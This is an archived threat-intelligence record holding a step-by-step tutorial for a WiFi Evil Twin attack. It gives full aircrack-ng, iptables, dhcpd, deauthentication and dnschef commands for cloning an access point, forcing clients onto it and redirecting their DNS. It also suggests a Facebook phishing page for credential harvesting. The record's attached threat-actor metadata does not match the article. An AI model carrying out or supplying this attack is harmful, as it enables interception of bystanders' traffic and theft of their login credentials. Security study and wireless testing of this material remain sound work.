{ "id": "6846f02e-58f9-465b-804a-bbe59b6aec52", "created_at": "2026-04-06T00:06:32.337083Z", "updated_at": "2026-04-10T13:12:55.210472Z", "deleted_at": null, "sha1_hash": "24cb253084aa70e6473b5b0fb23463c304fe89e7", "title": "Wireless Security— Evil Twin Attack", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1556055, "plain_text": "Wireless Security— Evil Twin Attack\r\nBy Kavishka Gihan\r\nPublished: 2021-08-08 · Archived: 2026-04-05 15:45:14 UTC\r\nPress enter or click to view image in full size\r\nIn this article, I am going to walk you through and explain the famous “Evil Twin Attack”. It is one of the most\r\npopular wireless attacks that is in the wild. Also, I will showcase how you can conduct a DNS spoofing attack\r\nagainst the clients.\r\nFor this attack, you will need a Linux-based operating system(I prefer Kali Linux ), a wireless adapter that\r\nsupports monitor mode ,aircrack-ng, dhcpd and dnschef. If you don’t have any of these tools, you install them\r\nwith apt.\r\napt install aircrack-ng\r\napt install dnschef\r\napt install isc-dhcp-server\r\nor get them from the GitHub repositories below.\r\nI am going to assume that you have some kind of knowledge about the basics of WiFi. But I will try to explain the\r\nmethodology in general as we go and also, here some resources that will help to get you on track.\r\nYou can get the required configuration files and other setup files from my GitHub repo.\r\nhttps://github.com/kavishkagihan/Evil-Twin-Attack\r\nhttps://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59\r\nPage 1 of 11\n\nWhat is an Evil Twin attack?\r\nThis is a method of attacking WiFi networks based on impersonation. In this attack, the attacker is hosting a\r\nfake access point impersonating the real one. Then the clients are tricked or rather forced to connect to the\r\nfake access point so that the attacker can control the client’s activity.\r\nStill confused ?? Look at the diagram below.\r\nHere we have a client connected to a router with the SSID (basically the name) of Cafewifi. And note that, this\r\nrouter is on channel 6. Also, we have an attacker in the right side hosting an AP (Access Point) on channel 11. And\r\nif you look closely, the SSID of that AP is the same as the real router.\r\nThis is what we call an Evil Twin. Since the Evil Twin or the fake AP has the same SSID, there is a chance that\r\nclients may think that this is the real router and connect to it.\r\nCool, Okay… But what if no one connects to our fake AP? What if they realize that this is a fake one and they\r\nconnect to the real one? That is where the deauthentication attack comes into play.\r\nWhat is a deauthentication attack ?\r\nTo understand this, let’s see what happens under the hood. So whenever you disconnect your device from a WiFi\r\nnetwork, your device sends a packet (a message basically) to the router called a Deauthentication packet.\r\nThis packet says the router “Hey man, I am going to disconnect now. So remove my connection”. Something like\r\nthat. Then the router checks if such a connection exists by looking at the MAC address of the packet’s source\r\nhttps://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59\r\nPage 2 of 11\n\n(the sender). If it finds one, it sends another packet saying “Okay. Now your are disconnected.” and just removes\r\nthat connection.\r\nWhat happens in the deauthentication attack is, an attacker is sending or broadcasting deauthentication\r\npackets as they are coming from the clients. So when the router receives these packets, it looks at the source\r\nMAC addresses of the packets and just disconnects the associated clients. The main reason this is possible is\r\nbecause this requires no encryption.\r\nWell, you might be thinking how do we use this to make the client connect to our AP. Well, as we disconnect them\r\nfrom the real network via a deauth attack, they automatically try to reconnect back to other networks it finds.\r\nSince our AP has a better connection than the real router and our AP is an open one, it will connect back to us.\r\nBut nowadays, most network devices are configured not to connect to an open network without any user\r\ninteraction. Nonetheless, there is a good chance of even the user getting tricked and connecting to the fake AP.\r\nBuilding the attack\r\nNow that you have a basic understanding how this attack works. Let’s start building our Evil Twin.\r\nWell, it’s not that simple as you saw on the diagrams. There are a couple of things that you have to configure in\r\norder for your attack to work.\r\n1. An Access Point\r\n2. A DHCP server\r\n3. A DNS server\r\nhttps://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59\r\nPage 3 of 11\n\nAs we discussed we have to impersonate the Access Point and make the clients connect to us instead of the real\r\nrouter. Then the DHCP server is used to give out an IP address for the clients and let them have a connection with\r\nthe AP. With the DNS server, we resolve the hostnames that our clients are looking for IP addresses.\r\nAdditionally, as I mentioned, I will showcase how you can spoof DNS and perform a DNS spoofing attack with\r\ndnschef.\r\nSetting up the wireless adapter\r\nFirst of all, we have to see what wireless adapters are connected. By default it is in managed mode.\r\niwconfig\r\nI have my adapter connected as wlan0. Then we have to change the wireless adapter to monitor mode. We can\r\nchange it with airmon-n, a part of the aircrack-ng.\r\nsudo airmon-ng start wlan0\r\nPress enter or click to view image in full size\r\nNow it is in monitor mode. You can check it with “iwconfig” again.\r\nhttps://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59\r\nPage 4 of 11\n\nAnd the interface name is the same as before. Yours may be wlan0mon or mon0 or something like that.\r\nMonitoring the network\r\nNow we have to pick some details about our target AP by monitoring the networks around. For that, you can use\r\nairodump-ng.\r\nsudo airodump-ng wlan0\r\nPress enter or click to view image in full size\r\nHere is my target. The ESSID is “HackMe”, BSSID (MAC) is “AA:BB:CC:DD:EE:FF” ,and the Channel is\r\n11.\r\nNow you can target this one and monitor that router specifically.\r\nsudo airodump-ng --bssid “AA:BB:CC:DD:EE:FF” -c 11 wlan0\r\nPress enter or click to view image in full size\r\nAs you can see we have a client connected.\r\nSetting up the Access Point\r\nFor this I am using a tool called airbase-ng, also a part of the aircrack-ng. If you want more control of the access\r\npoint you can use hostapd as well.\r\nhttps://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59\r\nPage 5 of 11\n\nsudo airbase-ng -e \"HackMe\" -c 10 wlan0\r\nHere we are setting the ESSID as the same as our target but not the channel. You can verify that your AP is\r\nenabled by just looking at the available WiFi settings or using the Windows Command Prompt.\r\nnetsh wlan show networks\r\nSetting up the interface and the IP table\r\nNow let’s go ahead and set up our interface and some IP rules so that we can forward and redirect traffic from our\r\nAP to the other interface(eth0).\r\nGet Kavishka Gihan’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nIf you look at the current interfaces you have, you will see that there is an interface called at0.\r\nifconfig at0\r\nThis is generated by airbase-ng. For this is to be used we have to assign this an IP and a subnet.\r\nsudo ifconfig at0 192.168.10.1 netmask 255.255.255.0\r\nsudo ifconfig at0 mtu 1400\r\nsudo route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.1\r\nNow if you look at that interface you will see that an IP and a netmask are assigned to it.\r\nhttps://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59\r\nPage 6 of 11\n\nAfter that, you can add an IP rule with iptables so that it allows traffic to flow from the AP interface(at0) to the\r\nEthernet interface(eth0) or maybe another WiFi interface. And if you don’t want your clients to have internet\r\naccess you can skip this step.\r\nsudo echo 1 \u003e /proc/sys/net/ipv4/ip_forward\r\nsudo iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.10.1\r\nsudo iptables -P FORWARD ACCEPT\r\nsudo iptables --append FORWARD --in-interface at0 -j ACCEPT\r\nsudo iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE\r\nsudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 80\r\nsudo iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 80\r\n(Note that you will have to do the sudo echo 1 \u003e /proc/sys/net/ipv4/ip_forward command as root )\r\nThis will add the specific IP rule and redirect port 80 of the AP interface (at0) to our local port 80. (Feel free to\r\nchange it \"--to-port 80\" )\r\nIf you need to forward any other ports, for example port 21(FTP) you can do that by adding a new rule just like\r\nthe last one with the --destination-port equals to be 21.\r\nSetting up the DHCP server\r\nAs mentioned, I will be using the isc-dhcpd as my DHCP server. You can just feed this a config file and run it with\r\nthat.\r\ndhcpd.conf\r\nauthoritative;\r\ndefault-lease-time 600;\r\nmax-lease-time 7200;\r\nsubnet 192.168.10.0 netmask 255.255.255.0 {\r\noption routers 192.168.10.1;\r\noption subnet-mask 255.255.255.0;\r\noption domain-name “HakeMe”;\r\noption domain-name-servers 192.168.10.1;\r\nrange 192.168.10.2 192.168.10.40;\r\n}\r\nhttps://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59\r\nPage 7 of 11\n\nThis is the content of the config file. You can save it however you want.\r\nHere, I have specified some important fields. The “option domain-name” is used to get a name for the doamin.\r\n“option domain-name-server” is used to specify the DNS server. “range” is the host range that is allowed.\r\nThis is a very simple configuration that I have used. But if you want more features to be added, you can check out\r\nthis documentation.\r\nAfter you are done with the configuration file, save it and start the server.\r\nsudo dhcpd -cf dhcpd.conf -pf /var/run/dhcpd.pid at0\r\nThe “-pf” flag will save the process id of the DHCP server in case you want to kill it.\r\nNow we are done with setting up the Access Point and the DHCP server. Now you can run airodump-ng again.\r\nsudo airodump-ng -c 10 wlan0\r\nPress enter or click to view image in full size\r\nAnd we can see our AP is up and running.\r\nPerforming the deauth attack\r\nNow it is time to perform the deauthentication attack and connect our victim back to us. I will use aireplay-ng for\r\nthis.\r\nAs we saw before our victim is connected to the real router. Now I am going to start airodump-ng on the real AP at\r\nthe same time and perform the deauth attack.\r\nsudo airodump-ng --bssid \"AA:BB:CC:DD:EE:FF\" -c 10 wlan0\r\nhttps://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59\r\nPage 8 of 11\n\nWe have the victim client still connected.Now let’s start our deauth attack. Make sure you provide the MAC\r\naddress of the real AP, not the fake one we made.\r\nsudo aireplay-ng --deauth 0 -a \"aa:bb:cc:dd:ee:ff\" -e \"HackMe\" wlan0\r\nNow the victim should be disconnected from the real router and connected back to us. Let’s see if it did.\r\nBOOM!!! Yes, it did. And just like that I disconnected the client from the real AP and connected back to mine.\r\nDNS Spoofing with dnschef\r\nLet’s get to the fun part. With dnschef you can make them go to anywhere you want.\r\nsudo dnschef --interface 192.168.10.1 --fakeip 192.168.10.1 --fakedomain\r\n*.ikea.com,*.starbucks.com\r\nPress enter or click to view image in full size\r\nhttps://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59\r\nPage 9 of 11\n\nIn this case when the client tries to go to ikea.com or starbucks.com, he will be redirected to the gateway\r\nwhich is our AP. Therefore, you can start a webserver on port 80 as we forwarded the interface port 80 to our\r\nlocal port 80. (in the IP rules)\r\nsudo service apache2 start\r\nLet the victim go to ikea.com or any other domain that you have specified.\r\nPress enter or click to view image in full size\r\nAs you can see the dnschef is answering the DNS queries for www.ikea.com to be 192.168.10.1\r\nhttps://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59\r\nPage 10 of 11\n\nAnd if you look at the victim’s web browser you will see that he is indeed redirected to our apache server.\r\nNow you can see the power of this attack. For example, you can host a phishing page of facebook on your server\r\nand spoof DNS to redirect any quires for facebook.com to your IP. As a result, you will be able to do credential\r\nharvesting as well.\r\nActually there is a another version of this “Evil Twin” attack called the “Karma Attack”. This attack is quite\r\nsimpler than this one but will need some basic knowledge that we discussed. I will show case about this attack in a\r\nfuture article.\r\nIf you have any questions make sure leave it down in the comments and I will try my best to answer.\r\nHappy hacking !!!\r\nSource: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59\r\nhttps://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59" ], "report_names": [ "wireless-security-evil-twin-attack-d3842f4aef59" ], "threat_actors": [ { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "20c759c2-cd02-45bb-85c6-41bde9e6a7cf", "created_at": "2024-01-18T02:02:34.189827Z", "updated_at": "2026-04-10T02:00:04.721082Z", "deleted_at": null, "main_name": "HomeLand Justice", "aliases": [ "Banished Kitten", "Karma", "Red Sandstorm", "Storm-0842", "Void Manticore" ], "source_name": "ETDA:HomeLand Justice", "tools": [ "BABYWIPER", "BiBi Wiper", "BiBi-Linux Wiper", "BiBi-Windows Wiper", "Cl Wiper", "LowEraser", "No-Justice Wiper", "Plink", "PuTTY Link", "RevSocks", "W2K Res Kit" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775433992, "ts_updated_at": 1775826775, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/24cb253084aa70e6473b5b0fb23463c304fe89e7.pdf", "text": "https://archive.orkl.eu/24cb253084aa70e6473b5b0fb23463c304fe89e7.txt", "img": "https://archive.orkl.eu/24cb253084aa70e6473b5b0fb23463c304fe89e7.jpg" } }